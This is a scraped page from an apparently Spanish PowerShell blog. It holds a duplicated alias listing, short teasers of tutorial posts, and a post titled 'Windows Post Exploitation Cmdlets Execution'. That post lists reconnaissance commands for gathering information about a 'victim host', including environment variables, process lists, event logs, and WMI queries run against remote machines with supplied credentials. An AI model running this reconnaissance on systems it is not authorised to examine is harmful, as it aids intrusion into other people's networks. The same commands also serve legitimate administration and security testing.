Remove-Item | Scripting and security

Alias           % -> ForEach-Object                                                   
Alias           ? -> Where-Object                                                     
Alias           ac -> Add-Content                                                     
Alias           asnp -> Add-PSSnapin                                                  
Alias           cat -> Get-Content                                                    
Alias           cd -> Set-Location                                                    
Alias           CFS -> ConvertFrom-String
Alias           chdir -> Set-Location                                                 
Alias           clc -> Clear-Content                                                  
Alias           clear -> Clear-Host                                                   
Alias           clhy -> Clear-History                                                 
Alias           cli -> Clear-Item                                                     
Alias           clp -> Clear-ItemProperty                                             
Alias           cls -> Clear-Host                                                     
Alias           clv -> Clear-Variable                                                 
Alias           cnsn -> Connect-PSSession                                             
Alias           compare -> Compare-Object                                             
Alias           copy -> Copy-Item                                                     
Alias           cp -> Copy-Item                                                       
Alias           cpi -> Copy-Item                                                      
Alias           cpp -> Copy-ItemProperty                                              
Alias           curl -> Invoke-WebRequest                                             
Alias           cvpa -> Convert-Path                                                  
Alias           dbp -> Disable-PSBreakpoint                                           
Alias           del -> Remove-Item                                                    
Alias           diff -> Compare-Object                                                
Alias           dir -> Get-ChildItem                                                  
Alias           dnsn -> Disconnect-PSSession                                          
Alias           ebp -> Enable-PSBreakpoint                                            
Alias           echo -> Write-Output                                                  
Alias           epal -> Export-Alias                                                  
Alias           epcsv -> Export-Csv                                                   
Alias           epsn -> Export-PSSession                                              
Alias           erase -> Remove-Item                                                  
Alias           etsn -> Enter-PSSession                                               
Alias           exsn -> Exit-PSSession                                                
Alias           fc -> Format-Custom                                                   
Alias           fhx -> Format-Hex
Alias           fl -> Format-List                                                     
Alias           foreach -> ForEach-Object                                             
Alias           ft -> Format-Table                                                    
Alias           fw -> Format-Wide                                                     
Alias           gal -> Get-Alias                                                      
Alias           gbp -> Get-PSBreakpoint                                               
Alias           gc -> Get-Content                                                     
Alias           gci -> Get-ChildItem                                                  
Alias           gcm -> Get-Command                                                    
Alias           gcs -> Get-PSCallStack                                                
Alias           gdr -> Get-PSDrive                                                    
Alias           ghy -> Get-History                                                    
Alias           gi -> Get-Item                                                        
Alias           gjb -> Get-Job                                                        
Alias           gl -> Get-Location                                                    
Alias           gm -> Get-Member                                                      
Alias           gmo -> Get-Module                                                     
Alias           gp -> Get-ItemProperty                                                
Alias           gps -> Get-Process                                                    
Alias           gpv -> Get-ItemPropertyValue                                          
Alias           group -> Group-Object                                                 
Alias           gsn -> Get-PSSession                                                  
Alias           gsnp -> Get-PSSnapin                                                  
Alias           gsv -> Get-Service                                                    
Alias           gu -> Get-Unique                                                      
Alias           gv -> Get-Variable                                                    
Alias           gwmi -> Get-WmiObject                                                 
Alias           h -> Get-History                                                      
Alias           history -> Get-History                                                
Alias           icm -> Invoke-Command                                                 
Alias           iex -> Invoke-Expression                                              
Alias           ihy -> Invoke-History                                                 
Alias           ii -> Invoke-Item                                                     
Alias           ipal -> Import-Alias                                                  
Alias           ipcsv -> Import-Csv                                                   
Alias           ipmo -> Import-Module                                                 
Alias           ipsn -> Import-PSSession                                              
Alias           irm -> Invoke-RestMethod                                              
Alias           ise -> powershell_ise.exe                                             
Alias           iwmi -> Invoke-WMIMethod                                              
Alias           iwr -> Invoke-WebRequest                                              
Alias           kill -> Stop-Process                                                  
Alias           lp -> Out-Printer                                                     
Alias           ls -> Get-ChildItem                                                   
Alias           man -> help                                                           
Alias           md -> mkdir                                                           
Alias           measure -> Measure-Object                                             
Alias           mi -> Move-Item                                                       
Alias           mount -> New-PSDrive                                                  
Alias           move -> Move-Item                                                     
Alias           mp -> Move-ItemProperty                                               
Alias           mv -> Move-Item                                                       
Alias           nal -> New-Alias                                                      
Alias           ndr -> New-PSDrive                                                    
Alias           ni -> New-Item                                                        
Alias           nmo -> New-Module                                                     
Alias           npssc -> New-PSSessionConfigurationFile                               
Alias           nsn -> New-PSSession                                                  
Alias           nv -> New-Variable                                                    
Alias           ogv -> Out-GridView                                                   
Alias           oh -> Out-Host                                                        
Alias           popd -> Pop-Location                                                  
Alias           ps -> Get-Process                                                     
Alias           pushd -> Push-Location                                                
Alias           pwd -> Get-Location                                                   
Alias           r -> Invoke-History                                                   
Alias           rbp -> Remove-PSBreakpoint                                            
Alias           rcjb -> Receive-Job                                                   
Alias           rcsn -> Receive-PSSession                                             
Alias           rd -> Remove-Item                                                     
Alias           rdr -> Remove-PSDrive                                                 
Alias           ren -> Rename-Item                                                    
Alias           ri -> Remove-Item                                                     
Alias           rjb -> Remove-Job                                                     
Alias           rm -> Remove-Item                                                     
Alias           rmdir -> Remove-Item                                                  
Alias           rmo -> Remove-Module                                                  
Alias           rni -> Rename-Item                                                    
Alias           rnp -> Rename-ItemProperty                                            
Alias           rp -> Remove-ItemProperty                                             
Alias           rsn -> Remove-PSSession                                               
Alias           rsnp -> Remove-PSSnapin                                               
Alias           rujb -> Resume-Job                                                    
Alias           rv -> Remove-Variable                                                 
Alias           rvpa -> Resolve-Path                                                  
Alias           rwmi -> Remove-WMIObject                                              
Alias           sajb -> Start-Job                                                     
Alias           sal -> Set-Alias                                                      
Alias           saps -> Start-Process                                                 
Alias           sasv -> Start-Service                                                 
Alias           sbp -> Set-PSBreakpoint                                               
Alias           sc -> Set-Content                                                     
Alias           select -> Select-Object                                               
Alias           set -> Set-Variable                                                   
Alias           shcm -> Show-Command                                                  
Alias           si -> Set-Item                                                        
Alias           sl -> Set-Location                                                    
Alias           sleep -> Start-Sleep                                                  
Alias           sls -> Select-String                                                  
Alias           sort -> Sort-Object                                                   
Alias           sp -> Set-ItemProperty                                                
Alias           spjb -> Stop-Job                                                      
Alias           spps -> Stop-Process                                                  
Alias           spsv -> Stop-Service                                                  
Alias           start -> Start-Process                                                
Alias           sujb -> Suspend-Job                                                   
Alias           sv -> Set-Variable                                                    
Alias           swmi -> Set-WMIInstance                                               
Alias           tee -> Tee-Object                                                     
Alias           trcm -> Trace-Command                                                 
Alias           type -> Get-Content                                                   
Alias           wget -> Invoke-WebRequest                                             
Alias           where -> Where-Object                                                 
Alias           wjb -> Wait-Job                                                       
Alias           write -> Write-Output

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

Alias % -> ForEach-Object

Alias ? -> Where-Object

Alias ac -> Add-Content

Alias asnp -> Add-PSSnapin

Alias cat -> Get-Content

Alias cd -> Set-Location

Alias CFS -> ConvertFrom-String

Alias chdir -> Set-Location

Alias clc -> Clear-Content

Alias clear -> Clear-Host

Alias clhy -> Clear-History

Alias cli -> Clear-Item

Alias clp -> Clear-ItemProperty

Alias cls -> Clear-Host

Alias clv -> Clear-Variable

Alias cnsn -> Connect-PSSession

Alias compare -> Compare-Object

Alias copy -> Copy-Item

Alias cp -> Copy-Item

Alias cpi -> Copy-Item

Alias cpp -> Copy-ItemProperty

Alias curl -> Invoke-WebRequest

Alias cvpa -> Convert-Path

Alias dbp -> Disable-PSBreakpoint

Alias del -> Remove-Item

Alias diff -> Compare-Object

Alias dir -> Get-ChildItem

Alias dnsn -> Disconnect-PSSession

Alias ebp -> Enable-PSBreakpoint

Alias echo -> Write-Output

Alias epal -> Export-Alias

Alias epcsv -> Export-Csv

Alias epsn -> Export-PSSession

Alias erase -> Remove-Item

Alias etsn -> Enter-PSSession

Alias exsn -> Exit-PSSession

Alias fc -> Format-Custom

Alias fhx -> Format-Hex

Alias fl -> Format-List

Alias foreach -> ForEach-Object

Alias ft -> Format-Table

Alias fw -> Format-Wide

Alias gal -> Get-Alias

Alias gbp -> Get-PSBreakpoint

Alias gc -> Get-Content

Alias gci -> Get-ChildItem

Alias gcm -> Get-Command

Alias gcs -> Get-PSCallStack

Alias gdr -> Get-PSDrive

Alias ghy -> Get-History

Alias gi -> Get-Item

Alias gjb -> Get-Job

Alias gl -> Get-Location

Alias gm -> Get-Member

Alias gmo -> Get-Module

Alias gp -> Get-ItemProperty

Alias gps -> Get-Process

Alias gpv -> Get-ItemPropertyValue

Alias group -> Group-Object

Alias gsn -> Get-PSSession

Alias gsnp -> Get-PSSnapin

Alias gsv -> Get-Service

Alias gu -> Get-Unique

Alias gv -> Get-Variable

Alias gwmi -> Get-WmiObject

Alias h -> Get-History

Alias history -> Get-History

Alias icm -> Invoke-Command

Alias iex -> Invoke-Expression

Alias ihy -> Invoke-History

Alias ii -> Invoke-Item

Alias ipal -> Import-Alias

Alias ipcsv -> Import-Csv

Alias ipmo -> Import-Module

Alias ipsn -> Import-PSSession

Alias irm -> Invoke-RestMethod

Alias ise -> powershell_ise.exe

Alias iwmi -> Invoke-WMIMethod

Alias iwr -> Invoke-WebRequest

Alias kill -> Stop-Process

Alias lp -> Out-Printer

Alias ls -> Get-ChildItem

Alias man -> help

Alias md -> mkdir

Alias measure -> Measure-Object

Alias mi -> Move-Item

Alias mount -> New-PSDrive

Alias move -> Move-Item

Alias mp -> Move-ItemProperty

Alias mv -> Move-Item

Alias nal -> New-Alias

Alias ndr -> New-PSDrive

Alias ni -> New-Item

Alias nmo -> New-Module

Alias npssc -> New-PSSessionConfigurationFile

Alias nsn -> New-PSSession

Alias nv -> New-Variable

Alias ogv -> Out-GridView

Alias oh -> Out-Host

Alias popd -> Pop-Location

Alias ps -> Get-Process

Alias pushd -> Push-Location

Alias pwd -> Get-Location

Alias r -> Invoke-History

Alias rbp -> Remove-PSBreakpoint

Alias rcjb -> Receive-Job

Alias rcsn -> Receive-PSSession

Alias rd -> Remove-Item

Alias rdr -> Remove-PSDrive

Alias ren -> Rename-Item

Alias ri -> Remove-Item

Alias rjb -> Remove-Job

Alias rm -> Remove-Item

Alias rmdir -> Remove-Item

Alias rmo -> Remove-Module

Alias rni -> Rename-Item

Alias rnp -> Rename-ItemProperty

Alias rp -> Remove-ItemProperty

Alias rsn -> Remove-PSSession

Alias rsnp -> Remove-PSSnapin

Alias rujb -> Resume-Job

Alias rv -> Remove-Variable

Alias rvpa -> Resolve-Path

Alias rwmi -> Remove-WMIObject

Alias sajb -> Start-Job

Alias sal -> Set-Alias

Alias saps -> Start-Process

Alias sasv -> Start-Service

Alias sbp -> Set-PSBreakpoint

Alias sc -> Set-Content

Alias select -> Select-Object

Alias set -> Set-Variable

Alias shcm -> Show-Command

Alias si -> Set-Item

Alias sl -> Set-Location

Alias sleep -> Start-Sleep

Alias sls -> Select-String

Alias sort -> Sort-Object

Alias sp -> Set-ItemProperty

Alias spjb -> Stop-Job

Alias spps -> Stop-Process

Alias spsv -> Stop-Service

Alias start -> Start-Process

Alias sujb -> Suspend-Job

Alias sv -> Set-Variable

Alias swmi -> Set-WMIInstance

Alias tee -> Tee-Object

Alias trcm -> Trace-Command

Alias type -> Get-Content

Alias wget -> Invoke-WebRequest

Alias where -> Where-Object

Alias wjb -> Wait-Job

Alias write -> Write-Output

PowerShell

4. Gestión del sistema de archivos en PowerShell (nivel intermedio)

04/07/201721/04/2019

La memoria que maneja el sistema operativo tiene limitaciones importantes, dos de ellas son la escasa cantidad de información que se puede almacenar en un espacio de direcciones, la otra es la volatilidad de los datos. La solución a este problema es almacenar la información en dispositivos de almacenamiento no volátil como son los discos duros, discos ópticos, etc. El almacenamiento de la información se lleva a cabo mediante archivos (también llamados ficheros). Un archivo se define como conjunto de datos almacenados en un dispositivo de almacenamiento, un ejemplo es una imagen fotográfica que consiste en un conjunto de bits […]

PowerShell

2. Programación en PowerShell (nivel intermedio)

02/07/201706/11/2019

La programación es necesaria para realizar tareas de forma automática y consiste en indicar ordenes al sistema, en PowerShell el conjunto de ordenes se puede realizar mediante scripts. Un script contiene un conjunto de comandos (cmdlets) y elementos de programación (bucles, condicionales, comparaciones, etc.) que se ejecutan sobre PowerShell y realizan alguna función. Ahora podemos hacernos algunas preguntas relacionadas con lo que queremos hacer utilizando scripts: ¿Cómo almacenar un valor de forma temporal? ¿Cómo almacenar un valor de forma permanente? ¿Cómo buscar una cadena? ¿Cómo buscar una cadena que ha introducido el usuario? ¿Cómo distinguir entre dos opciones? ¿Cómo distinguir entre […]

Filesystem Permissions PowerShell

4. Gestión de archivos en PowerShell para administradores de sistemas (nivel básico)

10/11/201602/06/2018

Los sistemas de archivos permiten organizar los datos en los dispositivos de almacenamiento siguiendo una serie de normas y restricciones. Un sistema de archivos se implanta después de crear una partición en un dispositivo de almacenamiento (disco duro, USB, CD/DVD, etc.). La unidad principal de los sistemas de archivos es el archivo, en general, los sistemas operativos distinguen entre estos tipos de archivos: Normales: los archivos pueden contener cualquier tipo de información. Directorios: son archivos que contienen información sobre la organización y estructura de otros archivos. Especiales: estos archivos permiten comunicarse con dispositivos de E/S. Los archivos tienes propiedades: Nombre: […]

PowerShell Security

Windows Post Exploitation Cmdlets Execution (PowerShell)

09/10/201610/06/2018

Presence This section focuses on information gathering about the victim host and the network that it’s attached to. System

#Shows all current environmental variables
$env:ALLUSERSPROFILE
$env:APPDATA
$env:CommonProgramFiles
${env:CommonProgramFiles(x86)}
$env:CommonProgramW6432
$env:COMPUTERNAME
$env:ComSpec
$env:FP_NO_HOST_CHECK
$env:HOMEDRIVE
$env:HOMEPATH
$env:LOCALAPPDATA
$env:LOGONSERVER
$env:NUMBER_OF_PROCESSORS
$env:OS
$env:Path
$env:PATHEXT
$env:PROCESSOR_ARCHITECTURE
$env:PROCESSOR_IDENTIFIER
$env:PROCESSOR_LEVEL
$env:PROCESSOR_REVISION
$env:ProgramData
$env:ProgramFiles
${env:ProgramFiles(x86)}
$env:ProgramW6432
$env:PSModulePath
$env:PUBLIC
$env:SESSIONNAME
$env:SystemRoot
$env:TEMP
$env:TMP
$env:USERDOMAIN
$env:USERDOMAIN_ROAMINGPROFILE
$env:USERNAME
$env:USERPROFILE
$env:SystemDrive
$env:windir

#Shows all current environmental variables (macOS)
$env:_ 
$env:LOGNAME
$env:SHLVL
$env:TERM_SESSION_ID
$env:PATHEXT
$env:__CF_USER_TEXT_ENCODING
$env:PATH
$env:SSH_AUTH_SOCK
$env:TMPDIR
$env:Apple_PubSub_Socket_Render
$env:PSMODULEPATH
$env:TERM
$env:USER
$env:HOME
$env:PWD
$env:TERM_PROGRAM
$env:XPC_FLAGS
$env:LC_CTYPE
$env:SHELL
$env:TERM_PROGRAM_VERSION
$env:XPC_SERVICE_NAME

#Information about disk
Get-Disk

#Retrieving Process Information
Get-Process | Select-Object Name,Path,Company,CPU,Product,TotalProcessorTime,StartTime

#Lists running threads for a specified process
(Get-Process chrome | Select-Object Threads).Threads
Get-Process | select -expand Threads

#Last Boot Uptime
Get-CimInstance -ClassName win32_operatingsystem | select csname, lastbootuptime

#Lists the current drivers on the system
Get-Process -Module

#Events and event logs on the local and remote
Get-EventLog -LogName System -EntryType Error, Warning
Get-EventLog -LogName System -EntryType Error, Warning -ComputerName $computer

#Shows all current environmental variables

$env:ALLUSERSPROFILE

$env:APPDATA

$env:CommonProgramFiles

${env:CommonProgramFiles(x86)}

$env:CommonProgramW6432

$env:COMPUTERNAME

$env:ComSpec

$env:FP_NO_HOST_CHECK

$env:HOMEDRIVE

$env:HOMEPATH

$env:LOCALAPPDATA

$env:LOGONSERVER

$env:NUMBER_OF_PROCESSORS

$env:OS

$env:Path

$env:PATHEXT

$env:PROCESSOR_ARCHITECTURE

$env:PROCESSOR_IDENTIFIER

$env:PROCESSOR_LEVEL

$env:PROCESSOR_REVISION

$env:ProgramData

$env:ProgramFiles

${env:ProgramFiles(x86)}

$env:ProgramW6432

$env:PSModulePath

$env:PUBLIC

$env:SESSIONNAME

$env:SystemRoot

$env:TEMP

$env:TMP

$env:USERDOMAIN

$env:USERDOMAIN_ROAMINGPROFILE

$env:USERNAME

$env:USERPROFILE

$env:SystemDrive

$env:windir

#Shows all current environmental variables (macOS)

$env:_

$env:LOGNAME

$env:SHLVL

$env:TERM_SESSION_ID

$env:PATHEXT

$env:__CF_USER_TEXT_ENCODING

$env:PATH

$env:SSH_AUTH_SOCK

$env:TMPDIR

$env:Apple_PubSub_Socket_Render

$env:PSMODULEPATH

$env:TERM

$env:USER

$env:HOME

$env:PWD

$env:TERM_PROGRAM

$env:XPC_FLAGS

$env:LC_CTYPE

$env:SHELL

$env:TERM_PROGRAM_VERSION

$env:XPC_SERVICE_NAME

#Information about disk

Get-Disk

#Retrieving Process Information

Get-Process | Select-Object Name,Path,Company,CPU,Product,TotalProcessorTime,StartTime

#Lists running threads for a specified process

(Get-Process chrome | Select-Object Threads).Threads

Get-Process | select -expand Threads

#Last Boot Uptime

Get-CimInstance -ClassName win32_operatingsystem | select csname, lastbootuptime

#Lists the current drivers on the system

Get-Process -Module

#Events and event logs on the local and remote

Get-EventLog -LogName System -EntryType Error, Warning

Get-EventLog -LogName System -EntryType Error, Warning -ComputerName $computer

WMI

#Information about disk
Get-WmiObject -Class win32_DiskDrive

#Retrieving the Shared Resources on the Local Computer
Get-WmiObject -Class Win32_Share

#Retrieving the Shared Resources on a Remote Computer
Get-WmiObject -Class Win32_Share -ComputerName COMPUTER

#Remote information
Get-WmiObject Win32_ComputerSystem -cn $computer
Get-WmiObject Win32_Group -cn $computer
Get-WmiObject Win32_LogicalDisk -cn $computer
Get-WmiObject Win32_NetworkClient -cn $computer
Get-WmiObject Win32_NetworkConnection -cn $computer
Get-WmiObject Win32_NetworkLoginProfile -cn $computer
Get-WmiObject Win32_NTLogEvent -cn $computer
Get-WmiObject Win32_OperatingSystem -cn $computer
Get-WmiObject Win32_Process -cn $computer
Get-WmiObject Win32_Product -cn $computer
Get-WmiObject Win32_QuickFixEngineering -cn $computer
Get-WmiObject Win32_Service -cn $computer
Get-WmiObject Win32_Share -cn $computer
Get-WmiObject Win32_StartupCommand -cn $computer
Get-WmiObject Win32_UserAccount -cn $computer
Get-WmiObject Win32_Volume -cn $computer

#Remote information (use credential)
$credenciales=Get-Credential
(Get-WmiObject Win32_AutochkSetting -ComputerName ('192.168.1.'+$_) -Credential $credenciales).SettingID
(Get-WmiObject Win32_BaseBoard -ComputerName ('192.168.1.'+$_) -Credential $credenciales).Manufacturer
(Get-WmiObject Win32_BIOS -ComputerName ('192.168.1.'+$_) -Credential $credenciales).Version
(Get-WmiObject Win32_Bus -ComputerName ('192.168.1.'+$_) -Credential $credenciales).DeviceID
Get-WmiObject Win32_Processor -ComputerName ('192.168.1.'+$_) -Credential $credenciales
Get-WmiObject Win32_SystemEnclosure -ComputerName ('192.168.1.'+$_) -Credential $credenciales
Get-WmiObject Win32_Battery -ComputerName ('192.168.1.'+$_) -Credential $credenciales
Get-WmiObject Win32_Printer -ComputerName ('192.168.1.'+$_) -Credential $credenciales

#WMI queries
$query="Select * from Msft_CliAlias"; Get-WMIObject -Query $query
$query="Select * from Win32_BaseBoard"; Get-WMIObject -Query $query
$query="Select * from Win32_BIOS"; Get-WMIObject -Query $query
$query="Select * from Win32_BootConfiguration"; Get-WMIObject -Query $query
$query="Select * from Win32_CDROMDrive"; Get-WMIObject -Query $query
$query="Select * from Win32_ComputerSystem"; Get-WMIObject -Query $query
$query="Select * from WIN32_PROCESSOR"; Get-WMIObject -Query $query
$query="Select * from Win32_ComputerSystemProduct"; Get-WMIObject -Query $query
$query="Select * from CIM_DataFile"; Get-WMIObject -Query $query
$query="Select * from WIN32_DCOMApplication"; Get-WMIObject -Query $query
$query="Select * from WIN32_DESKTOP"; Get-WMIObject -Query $query
$query="Select * from WIN32_DESKTOPMONITOR"; Get-WMIObject -Query $query
$query="Select * from Win32_DeviceMemoryAddress"; Get-WMIObject -Query $query
$query="Select * from Win32_DiskDrive"; Get-WMIObject -Query $query
$query="Select * from Win32_DiskQuota"; Get-WMIObject -Query $query
$query="Select * from Win32_DMAChannel"; Get-WMIObject -Query $query
$query="Select * from Win32_Environment"; Get-WMIObject -Query $query
$query="Select * from Win32_Directory"; Get-WMIObject -Query $query
$query="Select * from Win32_Group"; Get-WMIObject -Query $query
$query="Select * from Win32_IDEController"; Get-WMIObject -Query $query
$query="Select * from Win32_IRQResource"; Get-WMIObject -Query $query
$query="Select * from Win32_ScheduledJob"; Get-WMIObject -Query $query
$query="Select * from Win32_LoadOrderGroup"; Get-WMIObject -Query $query
$query="Select * from Win32_LogicalDisk"; Get-WMIObject -Query $query
$query="Select * from Win32_LogonSession"; Get-WMIObject -Query $query
$query="Select * from WIN32_CACHEMEMORY"; Get-WMIObject -Query $query
$query="Select * from Win32_PhysicalMemory"; Get-WMIObject -Query $query
$query="Select * from Win32_PhysicalMemoryArray"; Get-WMIObject -Query $query
$query="Select * from WIN32_NetworkClient"; Get-WMIObject -Query $query
$query="Select * from Win32_NetworkLoginProfile"; Get-WMIObject -Query $query
$query="Select * from Win32_NetworkProtocol"; Get-WMIObject -Query $query
$query="Select * from Win32_NetworkConnection"; Get-WMIObject -Query $query
$query="Select * from Win32_NetworkAdapter"; Get-WMIObject -Query $query
$query="Select * from Win32_NetworkAdapterConfiguration"; Get-WMIObject -Query $query
$query="Select * from Win32_NTDomain"; Get-WMIObject -Query $query
$query="Select * from Win32_NTLogEvent"; Get-WMIObject -Query $query
$query="Select * from Win32_NTEventlogFile"; Get-WMIObject -Query $query
$query="Select * from Win32_OnBoardDevice"; Get-WMIObject -Query $query
$query="Select * from Win32_OperatingSystem"; Get-WMIObject -Query $query
$query="Select * from Win32_PageFileUsage"; Get-WMIObject -Query $query
$query="Select * from Win32_PageFileSetting"; Get-WMIObject -Query $query
$query="Select * from Win32_DiskPartition"; Get-WMIObject -Query $query
$query="Select * from Win32_PortResource"; Get-WMIObject -Query $query
$query="Select * from Win32_PortConnector"; Get-WMIObject -Query $query
$query="Select * from Win32_Printer"; Get-WMIObject -Query $query
$query="Select * from Win32_PrinterConfiguration"; Get-WMIObject -Query $query
$query="Select * from Win32_PrintJob"; Get-WMIObject -Query $query
$query="Select * from Win32_Process"; Get-WMIObject -Query $query
$query="Select * from Win32_Product"; Get-WMIObject -Query $query
$query="Select * from Win32_QuickFixEngineering"; Get-WMIObject -Query $query
$query="Select * from Win32_QuotaSetting"; Get-WMIObject -Query $query
$query="Select * from Win32_TSAccount"; Get-WMIObject -Query $query
$query="Select * from Win32_TSNetworkAdapterSetting"; Get-WMIObject -Query $query
$query="Select * from Win32_TSPermissionsSetting"; Get-WMIObject -Query $query
$query="Select * from Win32_TerminalServiceSetting"; Get-WMIObject -Query $query
$query="Select * from Win32_OSRecoveryConfiguration"; Get-WMIObject -Query $query
$query="Select * from Win32_Registry"; Get-WMIObject -Query $query
$query="Select * from Win32_SCSIController"; Get-WMIObject -Query $query
$query="Select * from Win32_PerfRawData_PerfNet_Server"; Get-WMIObject -Query $query
$query="Select * from Win32_Service"; Get-WMIObject -Query $query
$query="Select * from Win32_ShadowCopy"; Get-WMIObject -Query $query
$query="Select * from Win32_ShadowStorage"; Get-WMIObject -Query $query
$query="Select * from Win32_Share"; Get-WMIObject -Query $query
$query="Select * from Win32_SoftwareElement"; Get-WMIObject -Query $query
$query="Select * from Win32_SoftwareFeature"; Get-WMIObject -Query $query
$query="Select * from WIN32_SoundDevice"; Get-WMIObject -Query $query
$query="Select * from Win32_StartupCommand"; Get-WMIObject -Query $query
$query="Select * from Win32_SystemAccount"; Get-WMIObject -Query $query
$query="Select * from Win32_SystemDriver"; Get-WMIObject -Query $query
$query="Select * from Win32_SystemEnclosure"; Get-WMIObject -Query $query
$query="Select * from Win32_SystemSlot"; Get-WMIObject -Query $query
$query="Select * from Win32_TapeDrive"; Get-WMIObject -Query $query
$query="Select * from Win32_TemperatureProbe"; Get-WMIObject -Query $query
$query="Select * from Win32_TimeZone"; Get-WMIObject -Query $query
$query="Select * from Win32_UninterruptiblePowerSupply"; Get-WMIObject -Query $query
$query="Select * from Win32_UserAccount"; Get-WMIObject -Query $query
$query="Select * from Win32_VoltageProbe"; Get-WMIObject -Query $query
$query="Select * from Win32_Volume"; Get-WMIObject -Query $query
$query="Select * from Win32_VolumeQuotaSetting"; Get-WMIObject -Query $query
$query="Select * from Win32_VolumeUserQuota"; Get-WMIObject -Query $query
$query="Select * from Win32_WMISetting"; Get-WMIObject -Query $query

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

#Information about disk

Get-WmiObject -Class win32_DiskDrive

#Retrieving the Shared Resources on the Local Computer

Get-WmiObject -Class Win32_Share

#Retrieving the Shared Resources on a Remote Computer

Get-WmiObject -Class Win32_Share -ComputerName COMPUTER

#Remote information

Get-WmiObject Win32_ComputerSystem -cn $computer

Get-WmiObject Win32_Group -cn $computer

Get-WmiObject Win32_LogicalDisk -cn $computer

Get-WmiObject Win32_NetworkClient -cn $computer

Get-WmiObject Win32_NetworkConnection -cn $computer

Get-WmiObject Win32_NetworkLoginProfile -cn $computer

Get-WmiObject Win32_NTLogEvent -cn $computer

Get-WmiObject Win32_OperatingSystem -cn $computer

Get-WmiObject Win32_Process -cn $computer

Get-WmiObject Win32_Product -cn $computer

Get-WmiObject Win32_QuickFixEngineering -cn $computer

Get-WmiObject Win32_Service -cn $computer

Get-WmiObject Win32_Share -cn $computer

Get-WmiObject Win32_StartupCommand -cn $computer

Get-WmiObject Win32_UserAccount -cn $computer

Get-WmiObject Win32_Volume -cn $computer

#Remote information (use credential)

$credenciales=Get-Credential

(Get-WmiObject Win32_AutochkSetting -ComputerName ('192.168.1.'+$_) -Credential $credenciales).SettingID

(Get-WmiObject Win32_BaseBoard -ComputerName ('192.168.1.'+$_) -Credential $credenciales).Manufacturer

(Get-WmiObject Win32_BIOS -ComputerName ('192.168.1.'+$_) -Credential $credenciales).Version

(Get-WmiObject Win32_Bus -ComputerName ('192.168.1.'+$_) -Credential $credenciales).DeviceID

Get-WmiObject Win32_Processor -ComputerName ('192.168.1.'+$_) -Credential $credenciales

Get-WmiObject Win32_SystemEnclosure -ComputerName ('192.168.1.'+$_) -Credential $credenciales

Get-WmiObject Win32_Battery -ComputerName ('192.168.1.'+$_) -Credential $credenciales

Get-WmiObject Win32_Printer -ComputerName ('192.168.1.'+$_) -Credential $credenciales

#WMI queries

$query="Select * from Msft_CliAlias"; Get-WMIObject -Query $query

$query="Select * from Win32_BaseBoard"; Get-WMIObject -Query $query

$query="Select * from Win32_BIOS"; Get-WMIObject -Query $query

$query="Select * from Win32_BootConfiguration"; Get-WMIObject -Query $query

$query="Select * from Win32_CDROMDrive"; Get-WMIObject -Query $query

$query="Select * from Win32_ComputerSystem"; Get-WMIObject -Query $query

$query="Select * from WIN32_PROCESSOR"; Get-WMIObject -Query $query

$query="Select * from Win32_ComputerSystemProduct"; Get-WMIObject -Query $query

$query="Select * from CIM_DataFile"; Get-WMIObject -Query $query

$query="Select * from WIN32_DCOMApplication"; Get-WMIObject -Query $query

$query="Select * from WIN32_DESKTOP"; Get-WMIObject -Query $query

$query="Select * from WIN32_DESKTOPMONITOR"; Get-WMIObject -Query $query

$query="Select * from Win32_DeviceMemoryAddress"; Get-WMIObject -Query $query

$query="Select * from Win32_DiskDrive"; Get-WMIObject -Query $query

$query="Select * from Win32_DiskQuota"; Get-WMIObject -Query $query

$query="Select * from Win32_DMAChannel"; Get-WMIObject -Query $query

$query="Select * from Win32_Environment"; Get-WMIObject -Query $query

$query="Select * from Win32_Directory"; Get-WMIObject -Query $query

$query="Select * from Win32_Group"; Get-WMIObject -Query $query

$query="Select * from Win32_IDEController"; Get-WMIObject -Query $query

$query="Select * from Win32_IRQResource"; Get-WMIObject -Query $query

$query="Select * from Win32_ScheduledJob"; Get-WMIObject -Query $query

$query="Select * from Win32_LoadOrderGroup"; Get-WMIObject -Query $query

$query="Select * from Win32_LogicalDisk"; Get-WMIObject -Query $query

$query="Select * from Win32_LogonSession"; Get-WMIObject -Query $query

$query="Select * from WIN32_CACHEMEMORY"; Get-WMIObject -Query $query

$query="Select * from Win32_PhysicalMemory"; Get-WMIObject -Query $query

$query="Select * from Win32_PhysicalMemoryArray"; Get-WMIObject -Query $query

$query="Select * from WIN32_NetworkClient"; Get-WMIObject -Query $query

$query="Select * from Win32_NetworkLoginProfile"; Get-WMIObject -Query $query

$query="Select * from Win32_NetworkProtocol"; Get-WMIObject -Query $query

$query="Select * from Win32_NetworkConnection"; Get-WMIObject -Query $query

$query="Select * from Win32_NetworkAdapter"; Get-WMIObject -Query $query

$query="Select * from Win32_NetworkAdapterConfiguration"; Get-WMIObject -Query $query

$query="Select * from Win32_NTDomain"; Get-WMIObject -Query $query

$query="Select * from Win32_NTLogEvent"; Get-WMIObject -Query $query

$query="Select * from Win32_NTEventlogFile"; Get-WMIObject -Query $query

$query="Select * from Win32_OnBoardDevice"; Get-WMIObject -Query $query

$query="Select * from Win32_OperatingSystem"; Get-WMIObject -Query $query

$query="Select * from Win32_PageFileUsage"; Get-WMIObject -Query $query

$query="Select * from Win32_PageFileSetting"; Get-WMIObject -Query $query

$query="Select * from Win32_DiskPartition"; Get-WMIObject -Query $query

$query="Select * from Win32_PortResource"; Get-WMIObject -Query $query

$query="Select * from Win32_PortConnector"; Get-WMIObject -Query $query

$query="Select * from Win32_Printer"; Get-WMIObject -Query $query

$query="Select * from Win32_PrinterConfiguration"; Get-WMIObject -Query $query

$query="Select * from Win32_PrintJob"; Get-WMIObject -Query $query

$query="Select * from Win32_Process"; Get-WMIObject -Query $query

$query="Select * from Win32_Product"; Get-WMIObject -Query $query

$query="Select * from Win32_QuickFixEngineering"; Get-WMIObject -Query $query

$query="Select * from Win32_QuotaSetting"; Get-WMIObject -Query $query

$query="Select * from Win32_TSAccount"; Get-WMIObject -Query $query

$query="Select * from Win32_TSNetworkAdapterSetting"; Get-WMIObject -Query $query

$query="Select * from Win32_TSPermissionsSetting"; Get-WMIObject -Query $query

$query="Select * from Win32_TerminalServiceSetting"; Get-WMIObject -Query $query

$query="Select * from Win32_OSRecoveryConfiguration"; Get-WMIObject -Query $query

